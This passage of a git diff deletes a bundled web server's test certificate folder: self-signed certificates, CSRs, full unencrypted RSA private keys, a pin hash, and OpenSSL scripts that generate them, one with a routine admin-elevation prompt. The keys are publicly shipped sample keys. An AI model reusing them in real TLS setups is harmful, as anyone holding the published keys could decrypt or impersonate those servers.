-7XRaw56E0XhvMBJW1CiUg944HSw4ptJli0dJCYa+P9s1Fop3lA0d9+dwKMKUyCDr
-yBz4XjyO9jXSQC/t0fkxC4gHhdH/ZaAq0Lem6Xxc40ZwoVc1+dHWFxn8d6L/RYvb
-16gOuw6s2Xt9h2K8OFKzehOgNZAkI2oUELRFUx9Wc8/Bcl6uEkBmPHRqeX5l35jo
-ztBrpAEsCy0cGg==
------END CERTIFICATE-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/client.csr b/thirdparty/civetweb-1.10/resources/cert/client.csr
deleted file mode 100644
index beb8466..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/client.csr
+++ /dev/null
@@ -1,16 +0,0 @@
------BEGIN CERTIFICATE REQUEST-----
-MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
-ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
-AQEBBQADggEPADCCAQoCggEBANyFUuYxv/uexSr/K9aSmcnEcylNH4S3NdlvMwFv
-W3XFqAV05tV6HnPnSELEk6t38aMDUGKDBrrjwsVK6+S7OyrkioXeB9dWldHbqD7o
-3MkIM3sUxUtaR6x0RMZ+sIX4XpE0xULcip1bG0etP4Z2frEP2IOOValQcm4SCnKY
-ZJyTr/oR31NmlIPU/47s74U6rqwwUE92bzvf1jGeUHEn7IAgSJNIUBNsOIdRQAMB
-uTJIAmG2qawXaetjLi/NBwNSd0OX2v3o9SrA+ZhQYpPG5xp3B3ncHgVvmhmp7hUd
-lYbiemcUHn18hZjxPVZLbtY8gQldrWyMZkVabSZjuIH3IKcCAwEAAaAAMA0GCSqG
-SIb3DQEBCwUAA4IBAQB/bapQm4nxXA01msL6nkjiVaeh/mj8Cr8sPFtQXVu+hxl9
-mjbisxDXwPhiFOiTlokQkINf+RMxQsVNr2y/sGZrSMimabwODDXnPpyir4b2WOWp
-VQQWbgnMVnvgKsjBpLLDr8VnLBiQ3mED+2QV0bxxJSgvvEuiZx/BlCgiu77D/8kj
-XUY/CXIBi00fIYigpRRdv2WtMQjtQe2fCSZZKOWu2ZWu2o24kEk28x5LO/WaJ4Ft
-lUHFOIp/wkKz/US4mbdQaD0bsg7MirAyGrCmZIHqQDhdDWq+o/brI7N/8yOk3qwc
-qPGkr9PYIPnuzZwStLJlPxKGXjCA40HpdmWA0kyc
------END CERTIFICATE REQUEST-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/client.key b/thirdparty/civetweb-1.10/resources/cert/client.key
deleted file mode 100644
index f041acc..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/client.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEA3IVS5jG/+57FKv8r1pKZycRzKU0fhLc12W8zAW9bdcWoBXTm
-1Xoec+dIQsSTq3fxowNQYoMGuuPCxUrr5Ls7KuSKhd4H11aV0duoPujcyQgzexTF
-S1pHrHRExn6whfhekTTFQtyKnVsbR60/hnZ+sQ/Yg45VqVBybhIKcphknJOv+hHf
-U2aUg9T/juzvhTqurDBQT3ZvO9/WMZ5QcSfsgCBIk0hQE2w4h1FAAwG5MkgCYbap
-rBdp62MuL80HA1J3Q5fa/ej1KsD5mFBik8bnGncHedweBW+aGanuFR2VhuJ6ZxQe
-fXyFmPE9Vktu1jyBCV2tbIxmRVptJmO4gfcgpwIDAQABAoIBAEpiBlZzTYi4Q1V/
-gO/9vzYZt6akxw7jJZzUL2Y6g6U0KLq+deZoLMF3sB4lZJIgATe1NHYmMCz2Coq1
-/N/Ib+rF8Bu7ivWN1TdWWmft8Bs3UvYfSXVjXG3FQjWaIjzuTCe6nxcwgOkXBBqn
-S5g1fAKJj8TATBCyfAa4uyFwWe+eGRs0W9pOMP8eU0EtvTer34rSU4L/LG3d7UcI
-upm/0T5QeLqv6Htv8UbHNQto701vJQVdWLavALMXGfGO112yTSz7OpitKpBEYDrV
-3+781zYm8AKkFIsRMXVK2HiBEF43zIrnNuoozsKpps/tZdlv9VqCSJ4hIaHm9mxJ
-3zMN3OECgYEA8dr5w68jTLrthDZ2qOG/6tZw9fMfXoF7hSUXplgxMN5Sohfr23Xm
-/IHVm7oiqhDNNZzplGyux7jB00x2/1ltOzay5mx4PMMLlsDBgiURgUwqS8C8dPVh
-0sN2RytdKGDmFP6lnKS7c15CEw1ChvdL4RwtqzjTKE0ZOK3zUY5/MykCgYEA6Wru
-Dusip4p4PA1K6eiCoC6SaqCuQCB7ZR5WPR5szAFkgoW63rNtC8S4Bl1qXXUb/v/V
-ptaVsGrqBc8/CxvCac1KCREbcyjuVWUAfw2VwdwgDbfrEieWrZNvsDs86EgB+Bo4
-Jm/cUjrFqSTJAbtvp4SYl1reax86XmCsHhNNf08CgYEApAhxd9/0IBlz+ET8K8SY
-5sy0ZouTjgRh40bqCF8uVcej4d45kGoh1Ma2Ot1+nzuwApm+7nTcAgd0JjxpRPzB
-EfUiVxfgYM2ksYVgeUVs3vXqheBdsTGwPENnmBN4Jme6BSlE573uiOu4ArXulh1p
-sG7tJoDu7hmEbqXELl9oNCkCgYEA51zWGnN3JhpakyuZ1cBhueRvvMEH9wg7Rz+K
-u4oszQmUVsu3Locqzz9uKODvTTOHTHrJi1WnifZvgNKr6pbZXYXenJ4YV01676nt
-lAIjLsTCANcMajJTaDl7u3L8LEEzsnhKr86w09Dtm3qawtzHD4Seu2eWjxelA2dP
-M4BukIECgYAn5n+HhCi5JD3I1VCX70uE5nj8alYyQ85qE57Lopmau1RyVfP4oeCt
-gMsy0o7vIF+xW1Z2yDxm+mJghOY/myDsbTGX9G8rY7PC7tWE8okjsQT5UoayFzKp
-mmvrTV8TQBVcTQqn0Jyj7T5MBnuwfioXYN9pKPQlvc4pPmHbqPi7CA==
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/client.pem b/thirdparty/civetweb-1.10/resources/cert/client.pem
deleted file mode 100644
index 6974c4c..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/client.pem
+++ /dev/null
@@ -1,46 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQCFpskbTEyGpTANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjIwNVoXDTI3MDkwMTE5MjIwNVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-ANyFUuYxv/uexSr/K9aSmcnEcylNH4S3NdlvMwFvW3XFqAV05tV6HnPnSELEk6t3
-8aMDUGKDBrrjwsVK6+S7OyrkioXeB9dWldHbqD7o3MkIM3sUxUtaR6x0RMZ+sIX4
-XpE0xULcip1bG0etP4Z2frEP2IOOValQcm4SCnKYZJyTr/oR31NmlIPU/47s74U6
-rqwwUE92bzvf1jGeUHEn7IAgSJNIUBNsOIdRQAMBuTJIAmG2qawXaetjLi/NBwNS
-d0OX2v3o9SrA+ZhQYpPG5xp3B3ncHgVvmhmp7hUdlYbiemcUHn18hZjxPVZLbtY8
-gQldrWyMZkVabSZjuIH3IKcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAUZsxxYVK
-l0tH8E0FCnRJTvG6gjOeiqJRIk7Mmg+hfFZK/ewqBixxg1OBM/xmPXfnI/ULRz74
-UMXnyDIsGakzrFDqWqPt3xots35yHHo2ZkVao6gV4qx0Reu86qeN5iRvG0EjoGMD
-7XRaw56E0XhvMBJW1CiUg944HSw4ptJli0dJCYa+P9s1Fop3lA0d9+dwKMKUyCDr
-yBz4XjyO9jXSQC/t0fkxC4gHhdH/ZaAq0Lem6Xxc40ZwoVc1+dHWFxn8d6L/RYvb
-16gOuw6s2Xt9h2K8OFKzehOgNZAkI2oUELRFUx9Wc8/Bcl6uEkBmPHRqeX5l35jo
-ztBrpAEsCy0cGg==
------END CERTIFICATE-----
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEA3IVS5jG/+57FKv8r1pKZycRzKU0fhLc12W8zAW9bdcWoBXTm
-1Xoec+dIQsSTq3fxowNQYoMGuuPCxUrr5Ls7KuSKhd4H11aV0duoPujcyQgzexTF
-S1pHrHRExn6whfhekTTFQtyKnVsbR60/hnZ+sQ/Yg45VqVBybhIKcphknJOv+hHf
-U2aUg9T/juzvhTqurDBQT3ZvO9/WMZ5QcSfsgCBIk0hQE2w4h1FAAwG5MkgCYbap
-rBdp62MuL80HA1J3Q5fa/ej1KsD5mFBik8bnGncHedweBW+aGanuFR2VhuJ6ZxQe
-fXyFmPE9Vktu1jyBCV2tbIxmRVptJmO4gfcgpwIDAQABAoIBAEpiBlZzTYi4Q1V/
-gO/9vzYZt6akxw7jJZzUL2Y6g6U0KLq+deZoLMF3sB4lZJIgATe1NHYmMCz2Coq1
-/N/Ib+rF8Bu7ivWN1TdWWmft8Bs3UvYfSXVjXG3FQjWaIjzuTCe6nxcwgOkXBBqn
-S5g1fAKJj8TATBCyfAa4uyFwWe+eGRs0W9pOMP8eU0EtvTer34rSU4L/LG3d7UcI
-upm/0T5QeLqv6Htv8UbHNQto701vJQVdWLavALMXGfGO112yTSz7OpitKpBEYDrV
-3+781zYm8AKkFIsRMXVK2HiBEF43zIrnNuoozsKpps/tZdlv9VqCSJ4hIaHm9mxJ
-3zMN3OECgYEA8dr5w68jTLrthDZ2qOG/6tZw9fMfXoF7hSUXplgxMN5Sohfr23Xm
-/IHVm7oiqhDNNZzplGyux7jB00x2/1ltOzay5mx4PMMLlsDBgiURgUwqS8C8dPVh
-0sN2RytdKGDmFP6lnKS7c15CEw1ChvdL4RwtqzjTKE0ZOK3zUY5/MykCgYEA6Wru
-Dusip4p4PA1K6eiCoC6SaqCuQCB7ZR5WPR5szAFkgoW63rNtC8S4Bl1qXXUb/v/V
-ptaVsGrqBc8/CxvCac1KCREbcyjuVWUAfw2VwdwgDbfrEieWrZNvsDs86EgB+Bo4
-Jm/cUjrFqSTJAbtvp4SYl1reax86XmCsHhNNf08CgYEApAhxd9/0IBlz+ET8K8SY
-5sy0ZouTjgRh40bqCF8uVcej4d45kGoh1Ma2Ot1+nzuwApm+7nTcAgd0JjxpRPzB
-EfUiVxfgYM2ksYVgeUVs3vXqheBdsTGwPENnmBN4Jme6BSlE573uiOu4ArXulh1p
-sG7tJoDu7hmEbqXELl9oNCkCgYEA51zWGnN3JhpakyuZ1cBhueRvvMEH9wg7Rz+K
-u4oszQmUVsu3Locqzz9uKODvTTOHTHrJi1WnifZvgNKr6pbZXYXenJ4YV01676nt
-lAIjLsTCANcMajJTaDl7u3L8LEEzsnhKr86w09Dtm3qawtzHD4Seu2eWjxelA2dP
-M4BukIECgYAn5n+HhCi5JD3I1VCX70uE5nj8alYyQ85qE57Lopmau1RyVfP4oeCt
-gMsy0o7vIF+xW1Z2yDxm+mJghOY/myDsbTGX9G8rY7PC7tWE8okjsQT5UoayFzKp
-mmvrTV8TQBVcTQqn0Jyj7T5MBnuwfioXYN9pKPQlvc4pPmHbqPi7CA==
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/make_certs.bat b/thirdparty/civetweb-1.10/resources/cert/make_certs.bat
deleted file mode 100644
index 66a091d..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/make_certs.bat
+++ /dev/null
@@ -1,55 +0,0 @@
-@echo off

-REM We need admin rights, otherwise the random state cannot be written

-REM Thanks to http://stackoverflow.com/a/10052222/1531708

-

-:: BatchGotAdmin

-:-------------------------------------

-REM  --> Check for permissions

-    IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (

->nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"

-) ELSE (

->nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

-)

-

-REM --> If error flag set, we do not have admin.

-if '%errorlevel%' NEQ '0' (

-    echo Requesting administrative privileges...

-    goto UACPrompt

-) else ( goto gotAdmin )

-

-:UACPrompt

-    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"

-    set params = %*:"=""

-    echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

-

-    "%temp%\getadmin.vbs"

-    del "%temp%\getadmin.vbs"

-    exit /B

-

-:gotAdmin

-    pushd "%CD%"

-    CD /D "%~dp0"

-:-------------------------------------- 

-

-del server.*

-

-c:\OpenSSL-Win32\bin\openssl.exe genrsa -des3 -out server.key 4096

-

-c:\OpenSSL-Win32\bin\openssl.exe req -sha256 -new -key server.key -out server.csr -utf8

-

-copy server.key server.key.orig

-

-c:\OpenSSL-Win32\bin\openssl.exe rsa -in server.key.orig -out server.key

-

-echo [ v3_ca ] > server.ext.txt

-echo [ req ] >> server.ext.txt

-echo req_extensions = my_extensions >> server.ext.txt

-echo [ my_extensions ] >> server.ext.txt

-echo extendedKeyUsage=serverAuth >> server.ext.txt

-echo crlDistributionPoints=URI:http://localhost/crl.pem >> server.ext.txt

-

-c:\OpenSSL-Win32\bin\openssl.exe x509 -req -days 365 -extensions v3_ca -extfile server.ext.txt -in server.csr -signkey server.key -out server.crt

-

-copy server.crt server.pem

-

-type server.key >> server.pem

diff --git a/thirdparty/civetweb-1.10/resources/cert/make_certs.sh b/thirdparty/civetweb-1.10/resources/cert/make_certs.sh
deleted file mode 100644
index b4b6714..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/make_certs.sh
+++ /dev/null
@@ -1,64 +0,0 @@
-#!/bin/sh
-#using "pass" for every password
-
-echo "Generating client certificate ..."
-
-openssl genrsa -des3 -out client.key 2048
-openssl req -new -key client.key -out client.csr
-
-cp client.key client.key.orig
-
-openssl rsa -in client.key.orig -out client.key
-
-openssl x509 -req -days 3650 -in client.csr -signkey client.key -out client.crt
-
-cp client.crt client.pem
-cat client.key >> client.pem
-
-openssl pkcs12 -export -inkey client.key -in client.pem -name ClientName -out client.pfx
-
-
-echo "Generating first server certificate ..."
-
-openssl genrsa -des3 -out server.key 2048
-openssl req -new -key server.key -out server.csr
-
-cp server.key server.key.orig
-
-openssl rsa -in server.key.orig -out server.key
-
-openssl x509 -req -days 3650 -in server.csr -signkey server.key -out server.crt
-
-cp server.crt server.pem
-cat server.key >> server.pem
-
-openssl pkcs12 -export -inkey server.key -in server.pem -name ServerName -out server.pfx
-
-echo "First server certificate hash for Public-Key-Pins header:"
-
-openssl x509 -pubkey < server.crt | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64 > server.pin
-
-cat server.pin
-
-echo "Generating backup server certificate ..."
-
-openssl genrsa -des3 -out server_bkup.key 2048
-openssl req -new -key server_bkup.key -out server_bkup.csr
-
-cp server_bkup.key server_bkup.key.orig
-
-openssl rsa -in server_bkup.key.orig -out server_bkup.key
-
-openssl x509 -req -days 3650 -in server_bkup.csr -signkey server_bkup.key -out server_bkup.crt
-
-cp server_bkup.crt server_bkup.pem
-cat server_bkup.key >> server_bkup.pem
-
-openssl pkcs12 -export -inkey server_bkup.key -in server_bkup.pem -name ServerName -out server_bkup.pfx
-
-echo "Backup server certificate hash for Public-Key-Pins header:"
-
-openssl x509 -pubkey < server_bkup.crt | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | base64 > server_bkup.pin
-
-cat server_bkup.pin
-
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.crt b/thirdparty/civetweb-1.10/resources/cert/server.crt
deleted file mode 100644
index a13fa01..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.crt
+++ /dev/null
@@ -1,19 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQDDIH/hK1C0BjANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjIyOVoXDTI3MDkwMTE5MjIyOVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-ALUmHEoJcebkUOyqEAhH2OdEuTTk8AxjjVvq9B1dXjlf/dvxGnZX2InScGCJA9Uy
-kO1XI8nLXKAGl6OL9jDt/0K3/oFLedDLtZf1qE+kEBuaqAgL+VVAPqwtQZcyCoI9
-zx777I1tPUOl1Q1ass3T7lYsTN8QADmW5zjJn4MJPMQ55qoQUL7HVQR4VJ/ELAXu
-xGkQlJFBY5q0Qq6buN102D2upNKXKpDYYPc0OgyJ73fR2+rzQapc52QD4Oh6cbD8
-Fh5Vh/qGNMckh1cQsVm6fRtlkoUqxANZk58rqkEwOuk04p7vlnVvZTidOng7G2nW
-1n7YQXCycI+JhofCqOqT9x8CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEATx5GZCxU
-KKQCDsafzAwoodbjRlpsJhvdCBGpgMrFTPyQo7BNF/E2XyVCDXbCmbxTRlhFafJG
-Loj/73toGkU8+1qUIy/Fffsmeh9YCyMlA2bE+85ccMCVKgCIEx0+fa6Au6/Ref7/
-n7vN/9deJzxWUaNbP26LNq3prbuIbKN6WFNT5mR8HLTmP3O45sqy1jwOZgSwvbgH
-bhugE4tSsKghMV5rUgiMhGIrEakFH+1LCZjQh+ojcWWEWyVk3QTQMmSd6tAZf4pb
-/Y1GuN6DAiLfzbabUQZCeQ1iZcgrwIOGHWJUPAf+BTPcFLlR3k/kYA9lrqvra7ln
-dFIuUv3YzfenfA==
------END CERTIFICATE-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.csr b/thirdparty/civetweb-1.10/resources/cert/server.csr
deleted file mode 100644
index fe5f3fc..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.csr
+++ /dev/null
@@ -1,16 +0,0 @@
------BEGIN CERTIFICATE REQUEST-----
-MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
-ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
-AQEBBQADggEPADCCAQoCggEBALUmHEoJcebkUOyqEAhH2OdEuTTk8AxjjVvq9B1d
-Xjlf/dvxGnZX2InScGCJA9UykO1XI8nLXKAGl6OL9jDt/0K3/oFLedDLtZf1qE+k
-EBuaqAgL+VVAPqwtQZcyCoI9zx777I1tPUOl1Q1ass3T7lYsTN8QADmW5zjJn4MJ
-PMQ55qoQUL7HVQR4VJ/ELAXuxGkQlJFBY5q0Qq6buN102D2upNKXKpDYYPc0OgyJ
-73fR2+rzQapc52QD4Oh6cbD8Fh5Vh/qGNMckh1cQsVm6fRtlkoUqxANZk58rqkEw
-Ouk04p7vlnVvZTidOng7G2nW1n7YQXCycI+JhofCqOqT9x8CAwEAAaAAMA0GCSqG
-SIb3DQEBCwUAA4IBAQCbJgy8LBoI+XCliwPGVM+ZuxEVuR15iaUSX7epuKb4jvyC
-y2+YQnNyxLkK8Bu2z9uxXUBbmhqXNiXZd7/SnbTR9MGMq3vyYg6Ggypo24DWez04
-tFaUiLJZsKVoVM6DP3zwpaKKSSJILU2GbNQKW87PHIPSdmAEh+gFD2Uy5sFrvuFJ
-LtHfIMMAhMSoEMjmjaLI7N4GVgFhGEr5q5HGpLuAU8cKGyKPkIkSyYN5Ott4u22d
-rpASF3TXfCJJ0YiM84U86rhZ0BrMqrVtw8r3uj+4G7hrE92eBU+DDn1D8jWzbyVc
-6dlTZaknMeJqsQe2/vq+T5P2yl+/39TnlvDO+cS2
------END CERTIFICATE REQUEST-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.key b/thirdparty/civetweb-1.10/resources/cert/server.key
deleted file mode 100644
index bd010ef..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.key
+++ /dev/null
@@ -1,27 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEAtSYcSglx5uRQ7KoQCEfY50S5NOTwDGONW+r0HV1eOV/92/Ea
-dlfYidJwYIkD1TKQ7VcjyctcoAaXo4v2MO3/Qrf+gUt50Mu1l/WoT6QQG5qoCAv5
-VUA+rC1BlzIKgj3PHvvsjW09Q6XVDVqyzdPuVixM3xAAOZbnOMmfgwk8xDnmqhBQ
-vsdVBHhUn8QsBe7EaRCUkUFjmrRCrpu43XTYPa6k0pcqkNhg9zQ6DInvd9Hb6vNB
-qlznZAPg6HpxsPwWHlWH+oY0xySHVxCxWbp9G2WShSrEA1mTnyuqQTA66TTinu+W
-dW9lOJ06eDsbadbWfthBcLJwj4mGh8Ko6pP3HwIDAQABAoIBAGgaacGGogW+Cl+n
-8CTCHX3y+bjTJL0J7S/426eQg9jXOI3QhpOiMlgqLtjbhO9d6vnqzS9oBmgUwcqE
-YcyGyd5u3P0zAeOjXk3hKIP0Vil2/L/7GaQLkrjiHUKlyHJG0SQORUiVkdKxl7nf
-+Mfe1qaBOQAsMuTluyXggSIOCfT+FdHoi6nr/+Nugyx7e/UrZ3GWHVbh8KXOlvHh
-kETfcI6KUkWKtE+YJx9w89Bjh8TBvU0nkOntR11T2SMNllyIS9nND8pqa7QPz3N0
-Ag/iN4Wh8S5f4Nn4GccAOtIORuYuw9Pmt1E9dFWEna1fGztBHlClFQPOLUhZ+/zR
-MfQV5bkCgYEA3pQTLZ5ldX1Kvg5sYw63wwewr147R0pav6AoJ8HTnWGqi5y485CX
-uKE/IcJseidG9FmkO7rfexQaBtW9eW0GCVru416VSP9g2r1iUu0ViaqctYt7ZacE
-UEI+g4FmaXHyn1CKTjJXgUAdoDbtlyHwLmLmNt+B3zKGa1lPIb5MwdMCgYEA0Fl7
-VCTnmdyFH8m/bK76uW7SgkYmKYd5AvDr2QFCSqY3tdZh2VIukoUPmheCFq0kpDc0
-+eT680rF/m6CCu+00nM6v/3TNARRANeQ2G73kTPpyiphE+ttKCBQ/tke3TcHQA85
-7cI6bfkMonyKi0JRdLs4QEWf86Avr6p6JKdQWgUCgYEA3oAT8+SF9D89umRcwWFz
-HcnQPF7sz0VrFmiZ+7RtQMTjYhFXalQ+91hp7euX2TzuV1JNNVCIG1dq9S4x7PKp
-uCxo5m4kugZg4gm0AsXyY95kLa+zuViOnVS7fWab5Aj+y3gN6kG07AYWF5URSaWp
-nhVLocso3uB5M1LiIg9EV/UCgYBNrN6Wyz9xFE6pQDzWlxGwakme+eomV3RdDVbQ
-S3DchcWFTEykicgFJghgCV2deKWNd2uPsreAVqMkLSzcSOuf/gesJkREQ0uzxaoh
-lpVDlBgYH96bX40NhabMrEOec3KHhmWxZ1UDRPNZ7JZ2Pp5Bp77b71knqdO9aRAq
-dBo3xQKBgQCnxheQbozuzPO/6nixAng1GP1GuuB2bVb4e5Z0+0dt2RfI8+MSqnSL
-q9Yr2+p/fJFkVthrOUYwJkMf7ujhK2uNCJ7aKmwHPSIRztNV3UDGFd9wgpj3Pebx
-36ahCvDzidTEG+EEra6zPJ1An3KEbPsfXwcy1NVEZ/kFQyzczL0AOw==
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.pem b/thirdparty/civetweb-1.10/resources/cert/server.pem
deleted file mode 100644
index 9a0027c..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.pem
+++ /dev/null
@@ -1,46 +0,0 @@
------BEGIN CERTIFICATE-----
-MIIDBjCCAe4CCQDDIH/hK1C0BjANBgkqhkiG9w0BAQsFADBFMQswCQYDVQQGEwJB
-VTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50ZXJuZXQgV2lkZ2l0
-cyBQdHkgTHRkMB4XDTE3MDkwMzE5MjIyOVoXDTI3MDkwMTE5MjIyOVowRTELMAkG
-A1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoMGEludGVybmV0
-IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
-ALUmHEoJcebkUOyqEAhH2OdEuTTk8AxjjVvq9B1dXjlf/dvxGnZX2InScGCJA9Uy
-kO1XI8nLXKAGl6OL9jDt/0K3/oFLedDLtZf1qE+kEBuaqAgL+VVAPqwtQZcyCoI9
-zx777I1tPUOl1Q1ass3T7lYsTN8QADmW5zjJn4MJPMQ55qoQUL7HVQR4VJ/ELAXu
-xGkQlJFBY5q0Qq6buN102D2upNKXKpDYYPc0OgyJ73fR2+rzQapc52QD4Oh6cbD8
-Fh5Vh/qGNMckh1cQsVm6fRtlkoUqxANZk58rqkEwOuk04p7vlnVvZTidOng7G2nW
-1n7YQXCycI+JhofCqOqT9x8CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEATx5GZCxU
-KKQCDsafzAwoodbjRlpsJhvdCBGpgMrFTPyQo7BNF/E2XyVCDXbCmbxTRlhFafJG
-Loj/73toGkU8+1qUIy/Fffsmeh9YCyMlA2bE+85ccMCVKgCIEx0+fa6Au6/Ref7/
-n7vN/9deJzxWUaNbP26LNq3prbuIbKN6WFNT5mR8HLTmP3O45sqy1jwOZgSwvbgH
-bhugE4tSsKghMV5rUgiMhGIrEakFH+1LCZjQh+ojcWWEWyVk3QTQMmSd6tAZf4pb
-/Y1GuN6DAiLfzbabUQZCeQ1iZcgrwIOGHWJUPAf+BTPcFLlR3k/kYA9lrqvra7ln
-dFIuUv3YzfenfA==
------END CERTIFICATE-----
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEAtSYcSglx5uRQ7KoQCEfY50S5NOTwDGONW+r0HV1eOV/92/Ea
-dlfYidJwYIkD1TKQ7VcjyctcoAaXo4v2MO3/Qrf+gUt50Mu1l/WoT6QQG5qoCAv5
-VUA+rC1BlzIKgj3PHvvsjW09Q6XVDVqyzdPuVixM3xAAOZbnOMmfgwk8xDnmqhBQ
-vsdVBHhUn8QsBe7EaRCUkUFjmrRCrpu43XTYPa6k0pcqkNhg9zQ6DInvd9Hb6vNB
-qlznZAPg6HpxsPwWHlWH+oY0xySHVxCxWbp9G2WShSrEA1mTnyuqQTA66TTinu+W
-dW9lOJ06eDsbadbWfthBcLJwj4mGh8Ko6pP3HwIDAQABAoIBAGgaacGGogW+Cl+n
-8CTCHX3y+bjTJL0J7S/426eQg9jXOI3QhpOiMlgqLtjbhO9d6vnqzS9oBmgUwcqE
-YcyGyd5u3P0zAeOjXk3hKIP0Vil2/L/7GaQLkrjiHUKlyHJG0SQORUiVkdKxl7nf
-+Mfe1qaBOQAsMuTluyXggSIOCfT+FdHoi6nr/+Nugyx7e/UrZ3GWHVbh8KXOlvHh
-kETfcI6KUkWKtE+YJx9w89Bjh8TBvU0nkOntR11T2SMNllyIS9nND8pqa7QPz3N0
-Ag/iN4Wh8S5f4Nn4GccAOtIORuYuw9Pmt1E9dFWEna1fGztBHlClFQPOLUhZ+/zR
-MfQV5bkCgYEA3pQTLZ5ldX1Kvg5sYw63wwewr147R0pav6AoJ8HTnWGqi5y485CX
-uKE/IcJseidG9FmkO7rfexQaBtW9eW0GCVru416VSP9g2r1iUu0ViaqctYt7ZacE
-UEI+g4FmaXHyn1CKTjJXgUAdoDbtlyHwLmLmNt+B3zKGa1lPIb5MwdMCgYEA0Fl7
-VCTnmdyFH8m/bK76uW7SgkYmKYd5AvDr2QFCSqY3tdZh2VIukoUPmheCFq0kpDc0
-+eT680rF/m6CCu+00nM6v/3TNARRANeQ2G73kTPpyiphE+ttKCBQ/tke3TcHQA85
-7cI6bfkMonyKi0JRdLs4QEWf86Avr6p6JKdQWgUCgYEA3oAT8+SF9D89umRcwWFz
-HcnQPF7sz0VrFmiZ+7RtQMTjYhFXalQ+91hp7euX2TzuV1JNNVCIG1dq9S4x7PKp
-uCxo5m4kugZg4gm0AsXyY95kLa+zuViOnVS7fWab5Aj+y3gN6kG07AYWF5URSaWp
-nhVLocso3uB5M1LiIg9EV/UCgYBNrN6Wyz9xFE6pQDzWlxGwakme+eomV3RdDVbQ
-S3DchcWFTEykicgFJghgCV2deKWNd2uPsreAVqMkLSzcSOuf/gesJkREQ0uzxaoh
-lpVDlBgYH96bX40NhabMrEOec3KHhmWxZ1UDRPNZ7JZ2Pp5Bp77b71knqdO9aRAq
-dBo3xQKBgQCnxheQbozuzPO/6nixAng1GP1GuuB2bVb4e5Z0+0dt2RfI8+MSqnSL
-q9Yr2+p/fJFkVthrOUYwJkMf7ujhK2uNCJ7aKmwHPSIRztNV3UDGFd9wgpj3Pebx
-36ahCvDzidTEG+EEra6zPJ1An3KEbPsfXwcy1NVEZ/kFQyzczL0AOw==
------END RSA PRIVATE KEY-----
diff --git a/thirdparty/civetweb-1.10/resources/cert/server.pin b/thirdparty/civetweb-1.10/resources/cert/server.pin
deleted file mode 100644
index 015792a..0000000
--- a/thirdparty/civetweb-1.10/resources/cert/server.pin
+++ /dev/null
@@ -1 +0,0 @@
-uz1UTAPen+xb+UoQqkVlEx4H653LbMjfRJcZx5OrjbI=
diff --git a/thirdparty/civetweb-1.10/resources/cert/server_bkup.crt b/thirdparty/civetweb-1.10/resources/cert/server_bkup.crt
deleted file mode 100644
index afe0d5d..0000000
